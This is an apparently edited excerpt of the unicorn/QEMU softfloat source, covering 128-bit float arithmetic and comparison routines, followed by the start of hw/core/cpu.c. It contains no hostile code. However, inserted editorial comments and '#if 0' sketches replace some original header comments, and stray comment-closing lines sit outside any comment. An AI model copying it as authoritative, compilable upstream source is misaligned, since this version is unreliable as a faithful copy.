    }
    else {
        return subFloat128Sigs(a, b, aSign, status);
    }
}
/*----------------------------------------------------------------------------
| Returns the result of subtracting the quadruple-precision floating-point
| values `a' and `b'.  The operation is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_sub(float128 a, float128 b, float_status *status)
{
    flag aSign, bSign;

    aSign = extractFloat128Sign( a );
    bSign = extractFloat128Sign( b );
    if ( aSign == bSign ) {
        return subFloat128Sigs(a, b, aSign, status);
    }
    else {
        return addFloat128Sigs(a, b, aSign, status);
    }
}

/*----------------------------------------------------------------------------
| Returns the result of multiplying the quadruple-precision floating-point
| values `a' and `b'.  The operation is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_mul(float128 a, float128 b, float_status *status)
{
    flag aSign, bSign, zSign;
    int32_t aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2, zSig3;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    bSign = extractFloat128Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FFF ) {
        if (    ( aSig0 | aSig1 )
             || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) {
            return propagateFloat128NaN(a, b, status);
        }
        if ( ( bExp | bSig0 | bSig1 ) == 0 ) goto invalid;
        return packFloat128( zSign, 0x7FFF, 0, 0 );
    }
    if ( bExp == 0x7FFF ) {
        if (bSig0 | bSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        if ( ( aExp | aSig0 | aSig1 ) == 0 ) {
 invalid:
            float_raise(float_flag_invalid, status);
            return float128_default_nan(status);
        }
        return packFloat128( zSign, 0x7FFF, 0, 0 );
    }
    if ( aExp == 0 ) {
        if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 );
        normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 );
    }
    if ( bExp == 0 ) {
        if ( ( bSig0 | bSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 );
        normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 );
    }
    zExp = aExp + bExp - 0x4000;
    aSig0 |= UINT64_C(0x0001000000000000);
    shortShift128Left( bSig0, bSig1, 16, &bSig0, &bSig1 );
    mul128To256( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1, &zSig2, &zSig3 );
    add128( zSig0, zSig1, aSig0, aSig1, &zSig0, &zSig1 );
    zSig2 |= ( zSig3 != 0 );
    if (UINT64_C( 0x0002000000000000) <= zSig0 ) {
        shift128ExtraRightJamming(
            zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 );
        ++zExp;
    }
    return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status);
}
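/*----------------------------------------------------------------------------
| Editor's note (illustrative): float128_mul() pre-shifts the second
| significand left by 16 so that the 256-bit product of mul128To256() lands
| with a fixed integer-bit position in zSig0; the add128() of the first
| significand afterwards accounts for b's implicit integer bit, which was
| never ORed in, since (1 + fb) * sa = sa + fb * sa.
*----------------------------------------------------------------------------*/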
/*----------------------------------------------------------------------------
| Returns the result of dividing the quadruple-precision floating-point value
| `a' by the corresponding value `b'.  The operation is performed according to
| the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_div(float128 a, float128 b, float_status *status)
{
    flag aSign, bSign, zSign;
    int32_t aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2;
    uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    bSign = extractFloat128Sign( b );
    zSign = aSign ^ bSign;
    if ( aExp == 0x7FFF ) {
        if (aSig0 | aSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        if ( bExp == 0x7FFF ) {
            if (bSig0 | bSig1) {
                return propagateFloat128NaN(a, b, status);
            }
            goto invalid;
        }
        return packFloat128( zSign, 0x7FFF, 0, 0 );
    }
    if ( bExp == 0x7FFF ) {
        if (bSig0 | bSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        return packFloat128( zSign, 0, 0, 0 );
    }
    if ( bExp == 0 ) {
        if ( ( bSig0 | bSig1 ) == 0 ) {
            if ( ( aExp | aSig0 | aSig1 ) == 0 ) {
 invalid:
                float_raise(float_flag_invalid, status);
                return float128_default_nan(status);
            }
            float_raise(float_flag_divbyzero, status);
            return packFloat128( zSign, 0x7FFF, 0, 0 );
        }
        normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 );
    }
    if ( aExp == 0 ) {
        if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 );
        normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 );
    }
    zExp = aExp - bExp + 0x3FFD;
    shortShift128Left(
        aSig0 | UINT64_C(0x0001000000000000), aSig1, 15, &aSig0, &aSig1 );
    shortShift128Left(
        bSig0 | UINT64_C(0x0001000000000000), bSig1, 15, &bSig0, &bSig1 );
    if ( le128( bSig0, bSig1, aSig0, aSig1 ) ) {
        shift128Right( aSig0, aSig1, 1, &aSig0, &aSig1 );
        ++zExp;
    }
    zSig0 = estimateDiv128To64( aSig0, aSig1, bSig0 );
    mul128By64To192( bSig0, bSig1, zSig0, &term0, &term1, &term2 );
    sub192( aSig0, aSig1, 0, term0, term1, term2, &rem0, &rem1, &rem2 );
    while ( (int64_t) rem0 < 0 ) {
        --zSig0;
        add192( rem0, rem1, rem2, 0, bSig0, bSig1, &rem0, &rem1, &rem2 );
    }
    zSig1 = estimateDiv128To64( rem1, rem2, bSig0 );
    if ( ( zSig1 & 0x3FFF ) <= 4 ) {
        mul128By64To192( bSig0, bSig1, zSig1, &term1, &term2, &term3 );
        sub192( rem1, rem2, 0, term1, term2, term3, &rem1, &rem2, &rem3 );
        while ( (int64_t) rem1 < 0 ) {
            --zSig1;
            add192( rem1, rem2, rem3, 0, bSig0, bSig1, &rem1, &rem2, &rem3 );
        }
        zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 );
    }
    shift128ExtraRightJamming( zSig0, zSig1, 0, 15, &zSig0, &zSig1, &zSig2 );
    return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status);
}
/*----------------------------------------------------------------------------
| Returns the remainder of the quadruple-precision floating-point value `a'
| with respect to the corresponding value `b'.  The operation is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_rem(float128 a, float128 b, float_status *status)
{
    flag aSign, zSign;
    int32_t aExp, bExp, expDiff;
    uint64_t aSig0, aSig1, bSig0, bSig1, q, term0, term1, term2;
    uint64_t allZero, alternateASig0, alternateASig1, sigMean1;
    int64_t sigMean0;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    if ( aExp == 0x7FFF ) {
        if (    ( aSig0 | aSig1 )
             || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) {
            return propagateFloat128NaN(a, b, status);
        }
        goto invalid;
    }
    if ( bExp == 0x7FFF ) {
        if (bSig0 | bSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        return a;
    }
    if ( bExp == 0 ) {
        if ( ( bSig0 | bSig1 ) == 0 ) {
 invalid:
            float_raise(float_flag_invalid, status);
            return float128_default_nan(status);
        }
        normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 );
    }
    if ( aExp == 0 ) {
        if ( ( aSig0 | aSig1 ) == 0 ) return a;
        normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 );
    }
    expDiff = aExp - bExp;
    if ( expDiff < -1 ) return a;
    shortShift128Left(
        aSig0 | UINT64_C(0x0001000000000000),
        aSig1,
        15 - ( expDiff < 0 ),
        &aSig0,
        &aSig1
    );
    shortShift128Left(
        bSig0 | UINT64_C(0x0001000000000000), bSig1, 15, &bSig0, &bSig1 );
    q = le128( bSig0, bSig1, aSig0, aSig1 );
    if ( q ) sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 );
    expDiff -= 64;
    while ( 0 < expDiff ) {
        q = estimateDiv128To64( aSig0, aSig1, bSig0 );
        q = ( 4 < q ) ? q - 4 : 0;
        mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 );
        shortShift192Left( term0, term1, term2, 61, &term1, &term2, &allZero );
        shortShift128Left( aSig0, aSig1, 61, &aSig0, &allZero );
        sub128( aSig0, 0, term1, term2, &aSig0, &aSig1 );
        expDiff -= 61;
    }
    if ( -64 < expDiff ) {
        q = estimateDiv128To64( aSig0, aSig1, bSig0 );
        q = ( 4 < q ) ? q - 4 : 0;
        q >>= - expDiff;
        shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 );
        expDiff += 52;
        if ( expDiff < 0 ) {
            shift128Right( aSig0, aSig1, - expDiff, &aSig0, &aSig1 );
        }
        else {
            shortShift128Left( aSig0, aSig1, expDiff, &aSig0, &aSig1 );
        }
        mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 );
        sub128( aSig0, aSig1, term1, term2, &aSig0, &aSig1 );
    }
    else {
        shift128Right( aSig0, aSig1, 12, &aSig0, &aSig1 );
        shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 );
    }
    do {
        alternateASig0 = aSig0;
        alternateASig1 = aSig1;
        ++q;
        sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 );
    } while ( 0 <= (int64_t) aSig0 );
    add128(
        aSig0, aSig1, alternateASig0, alternateASig1,
        (uint64_t *)&sigMean0, &sigMean1 );
    if (    ( sigMean0 < 0 )
         || ( ( ( sigMean0 | sigMean1 ) == 0 ) && ( q & 1 ) ) ) {
        aSig0 = alternateASig0;
        aSig1 = alternateASig1;
    }
    zSign = ( (int64_t) aSig0 < 0 );
    if ( zSign ) sub128( 0, 0, aSig0, aSig1, &aSig0, &aSig1 );
    return normalizeRoundAndPackFloat128(aSign ^ zSign, bExp - 4, aSig0,
                                         aSig1, status);
}
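/*----------------------------------------------------------------------------
| Editor's note (illustrative): the closing loop of float128_rem() steps the
| remainder below zero on purpose; averaging the last nonnegative and first
| negative remainders (sigMean) decides whether the quotient should have been
| one larger, which yields the IEEE remainder rounded to nearest-even rather
| than a simply truncated one.
*----------------------------------------------------------------------------*/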
*----------------------------------------------------------------------------*/ float128 float128_sqrt(float128 a, float_status *status) { flag aSign; int32_t aExp, zExp; uint64_t aSig0, aSig1, zSig0, zSig1, zSig2, doubleZSig0; uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; aSig1 = extractFloat128Frac1( a ); aSig0 = extractFloat128Frac0( a ); aExp = extractFloat128Exp( a ); aSign = extractFloat128Sign( a ); if ( aExp == 0x7FFF ) { if (aSig0 | aSig1) { return propagateFloat128NaN(a, a, status); } if ( ! aSign ) return a; goto invalid; } if ( aSign ) { if ( ( aExp | aSig0 | aSig1 ) == 0 ) return a; invalid: float_raise(float_flag_invalid, status); return float128_default_nan(status); } if ( aExp == 0 ) { if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( 0, 0, 0, 0 ); normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); } zExp = ( ( aExp - 0x3FFF )>>1 ) + 0x3FFE; aSig0 |= UINT64_C(0x0001000000000000); zSig0 = estimateSqrt32( aExp, aSig0>>17 ); shortShift128Left( aSig0, aSig1, 13 - ( aExp & 1 ), &aSig0, &aSig1 ); zSig0 = estimateDiv128To64( aSig0, aSig1, zSig0<<32 ) + ( zSig0<<30 ); doubleZSig0 = zSig0<<1; mul64To128( zSig0, zSig0, &term0, &term1 ); sub128( aSig0, aSig1, term0, term1, &rem0, &rem1 ); while ( (int64_t) rem0 < 0 ) { --zSig0; doubleZSig0 -= 2; add128( rem0, rem1, zSig0>>63, doubleZSig0 | 1, &rem0, &rem1 ); } zSig1 = estimateDiv128To64( rem1, 0, doubleZSig0 ); if ( ( zSig1 & 0x1FFF ) <= 5 ) { if ( zSig1 == 0 ) zSig1 = 1; mul64To128( doubleZSig0, zSig1, &term1, &term2 ); sub128( rem1, 0, term1, term2, &rem1, &rem2 ); mul64To128( zSig1, zSig1, &term2, &term3 ); sub192( rem1, rem2, 0, 0, term2, term3, &rem1, &rem2, &rem3 ); while ( (int64_t) rem1 < 0 ) { --zSig1; shortShift128Left( 0, zSig1, 1, &term2, &term3 ); term3 |= 1; term2 |= doubleZSig0; add192( rem1, rem2, rem3, 0, term2, term3, &rem1, &rem2, &rem3 ); } zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); } shift128ExtraRightJamming( zSig0, zSig1, 0, 14, &zSig0, &zSig1, &zSig2 ); return roundAndPackFloat128(0, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_eq(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
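*----------------------------------------------------------------------------*/

/* Added note with a sketch (not part of the original source): in
 * float128_eq() above, the `(a.high | b.high) << 1` term shifts the sign bit
 * out, so +0 and -0 compare equal even though their encodings differ. */
#if 0
static void float128_eq_zero_example(float_status *st)
{
    float128 pz = packFloat128(0, 0, 0, 0); /* +0.0 */
    float128 nz = packFloat128(1, 0, 0, 0); /* -0.0 */
    int eq = float128_eq(pz, nz, st);       /* 1 */
    (void)eq;
}
#endif

/*----------------------------------------------------------------------------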
*----------------------------------------------------------------------------*/ int float128_le(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_lt(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_unordered(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. 
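*----------------------------------------------------------------------------*/

/* Added sketch (not part of the original source) contrasting the two
 * predicate families: float128_eq() raises float_flag_invalid for any NaN
 * operand, while the _quiet variants below only do so for signaling NaNs. */
#if 0
static void float128_quiet_compare_example(float_status *st)
{
    float128 qnan = float128_default_nan(st); /* quiet NaN */
    float128 one = packFloat128(0, 0x3FFF, 0, 0);
    st->float_exception_flags = 0;
    (void)float128_eq(qnan, one, st);         /* sets float_flag_invalid */
    st->float_exception_flags = 0;
    (void)float128_eq_quiet(qnan, one, st);   /* leaves the flags clear */
}
#endif

/*----------------------------------------------------------------------------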
*----------------------------------------------------------------------------*/ int float128_eq_quiet(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } return ( a.low == b.low ) && ( ( a.high == b.high ) || ( ( a.low == 0 ) && ( (uint64_t) ( ( a.high | b.high )<<1 ) == 0 ) ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_le_quiet(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign || ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) == 0 ); } return aSign ? le128( b.high, b.low, a.high, a.low ) : le128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float128_lt_quiet(float128 a, float128 b, float_status *status) { flag aSign, bSign; if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { return aSign && ( ( ( (uint64_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low ) != 0 ); } return aSign ? lt128( b.high, b.low, a.high, a.low ) : lt128( a.high, a.low, b.high, b.low ); } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. 
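*----------------------------------------------------------------------------*/

/* Added note (not part of the original source): the compare helpers further
 * below return the float_relation_* encoding (less = -1, equal = 0,
 * greater = 1, unordered = 2), so for operands of different signs the
 * expression `1 - (2 * aSign)` maps a positive `a` to "greater" and a
 * negative `a` to "less" in a single step. */

/*----------------------------------------------------------------------------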
*----------------------------------------------------------------------------*/ int float128_unordered_quiet(float128 a, float128 b, float_status *status) { if ( ( ( extractFloat128Exp( a ) == 0x7FFF ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7FFF ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) ) ) { if (float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } static inline int floatx80_compare_internal(floatx80 a, floatx80 b, int is_quiet, float_status *status) { flag aSign, bSign; if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) { float_raise(float_flag_invalid, status); return float_relation_unordered; } if (( ( extractFloatx80Exp( a ) == 0x7fff ) && ( extractFloatx80Frac( a )<<1 ) ) || ( ( extractFloatx80Exp( b ) == 0x7fff ) && ( extractFloatx80Frac( b )<<1 ) )) { if (!is_quiet || floatx80_is_signaling_nan(a, status) || floatx80_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return float_relation_unordered; } aSign = extractFloatx80Sign( a ); bSign = extractFloatx80Sign( b ); if ( aSign != bSign ) { if ( ( ( (uint16_t) ( ( a.high | b.high ) << 1 ) ) == 0) && ( ( a.low | b.low ) == 0 ) ) { /* zero case */ return float_relation_equal; } else { return 1 - (2 * aSign); } } else { if (a.low == b.low && a.high == b.high) { return float_relation_equal; } else { return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); } } } int floatx80_compare(floatx80 a, floatx80 b, float_status *status) { return floatx80_compare_internal(a, b, 0, status); } int floatx80_compare_quiet(floatx80 a, floatx80 b, float_status *status) { return floatx80_compare_internal(a, b, 1, status); } static inline int float128_compare_internal(float128 a, float128 b, int is_quiet, float_status *status) { flag aSign, bSign; if (( ( extractFloat128Exp( a ) == 0x7fff ) && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || ( ( extractFloat128Exp( b ) == 0x7fff ) && ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) )) { if (!is_quiet || float128_is_signaling_nan(a, status) || float128_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return float_relation_unordered; } aSign = extractFloat128Sign( a ); bSign = extractFloat128Sign( b ); if ( aSign != bSign ) { if ( ( ( ( a.high | b.high )<<1 ) | a.low | b.low ) == 0 ) { /* zero case */ return float_relation_equal; } else { return 1 - (2 * aSign); } } else { if (a.low == b.low && a.high == b.high) { return float_relation_equal; } else { return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); } } } int float128_compare(float128 a, float128 b, float_status *status) { return float128_compare_internal(a, b, 0, status); } int float128_compare_quiet(float128 a, float128 b, float_status *status) { return float128_compare_internal(a, b, 1, status); } floatx80 floatx80_scalbn(floatx80 a, int n, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( aExp == 0x7FFF ) { if ( aSig<<1 ) { return propagateFloatx80NaN(a, a, status); } return a; } if (aExp == 0) { if (aSig == 0) { return a; } aExp++; } if (n > 0x10000) { n = 0x10000; } else if (n < -0x10000) { n = -0x10000; } aExp += n; return 
        normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision,
                                      aSign, aExp, aSig, 0, status);
}

float128 float128_scalbn(float128 a, int n, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return propagateFloat128NaN(a, a, status);
        }
        return a;
    }
    if (aExp != 0) {
        aSig0 |= UINT64_C(0x0001000000000000);
    } else if (aSig0 == 0 && aSig1 == 0) {
        return a;
    } else {
        aExp++;
    }

    if (n > 0x10000) {
        n = 0x10000;
    } else if (n < -0x10000) {
        n = -0x10000;
    }

    aExp += n - 1;
    return normalizeRoundAndPackFloat128( aSign, aExp, aSig0, aSig1, status);
}

void softfloat_init(void)
{
    union_float64 ua, ub, uc, ur;

    if (QEMU_NO_HARDFLOAT) {
        return;
    }
    /*
     * Test that the host's FMA is not obviously broken. For example,
     * glibc < 2.23 can perform an incorrect FMA on certain hosts; see
     *   https://sourceware.org/bugzilla/show_bug.cgi?id=13304
     */
    ua.s = 0x0020000000000001ULL;
    ub.s = 0x3ca0000000000000ULL;
    uc.s = 0x0020000000000000ULL;
    ur.h = fma(ua.h, ub.h, uc.h);
    if (ur.s != 0x0020000000000001ULL) {
        force_soft_fma = true;
    }
}

unicorn-2.1.1/qemu/hw/core/cpu.c

/*
 * QEMU CPU model
 *
 * Copyright (c) 2012-2014 SUSE LINUX Products GmbH
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "uc_priv.h" #include "qemu/osdep.h" #include "hw/core/cpu.h" #include "sysemu/tcg.h" bool cpu_paging_enabled(const CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); return cc->get_paging_enabled(cpu); } static bool cpu_common_get_paging_enabled(const CPUState *cpu) { return false; } void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->get_memory_mapping(cpu, list); } static void cpu_common_get_memory_mapping(CPUState *cpu, MemoryMappingList *list) { // error_setg(errp, "Obtaining memory mappings is unsupported on this CPU."); } /* Resetting the IRQ comes from across the code base so we take the * BQL here if we need to. cpu_interrupt assumes it is held.*/ void cpu_reset_interrupt(CPUState *cpu, int mask) { cpu->interrupt_request &= ~mask; } void cpu_exit(CPUState *cpu) { cpu->exit_request = 1; cpu->tcg_exit_req = 1; cpu->icount_decr_ptr->u16.high = -1; } static void cpu_common_noop(CPUState *cpu) { } static bool cpu_common_exec_interrupt(CPUState *cpu, int int_req) { return false; } void cpu_reset(CPUState *cpu) { CPUClass *klass = CPU_GET_CLASS(cpu); if (klass->reset != NULL) { (*klass->reset)(cpu); } } static void cpu_common_reset(CPUState *dev) { CPUState *cpu = CPU(dev); cpu->interrupt_request = 0; cpu->halted = 0; cpu->mem_io_pc = 0; cpu->icount_extra = 0; cpu->can_do_io = 1; cpu->exception_index = -1; cpu->crash_occurred = false; cpu->cflags_next_tb = -1; cpu_tb_jmp_cache_clear(cpu); cpu->uc->tcg_flush_tlb(cpu->uc); } static bool cpu_common_has_work(CPUState *cs) { return false; } static int64_t cpu_common_get_arch_id(CPUState *cpu) { return cpu->cpu_index; } void cpu_class_init(struct uc_struct *uc, CPUClass *k) { k->get_arch_id = cpu_common_get_arch_id; k->has_work = cpu_common_has_work; k->get_paging_enabled = cpu_common_get_paging_enabled; k->get_memory_mapping = cpu_common_get_memory_mapping; k->debug_excp_handler = cpu_common_noop; k->cpu_exec_enter = cpu_common_noop; k->cpu_exec_exit = cpu_common_noop; k->cpu_exec_interrupt = cpu_common_exec_interrupt; /* instead of dc->reset. 
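 * (Added note: unicorn has no qdev/DeviceClass, so the reset hook is wired
 * directly onto the CPUClass here; cpu_common_reset() above clears pending
 * interrupt, halt and exception state, empties the TB jump cache and asks
 * uc to flush the TLB so stale translations are not reused on the next
 * emulation run.)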
     */
    k->reset = cpu_common_reset;
    return;
}

void cpu_common_initfn(struct uc_struct *uc, CPUState *cs)
{
    CPUState *cpu = CPU(cs);

    cpu->cpu_index = UNASSIGNED_CPU_INDEX;
    cpu->cluster_index = UNASSIGNED_CLUSTER_INDEX;
    /* *-user doesn't have configurable SMP topology */
    /* the default value is changed by qemu_init_vcpu() for softmmu */
    cpu->nr_cores = 1;
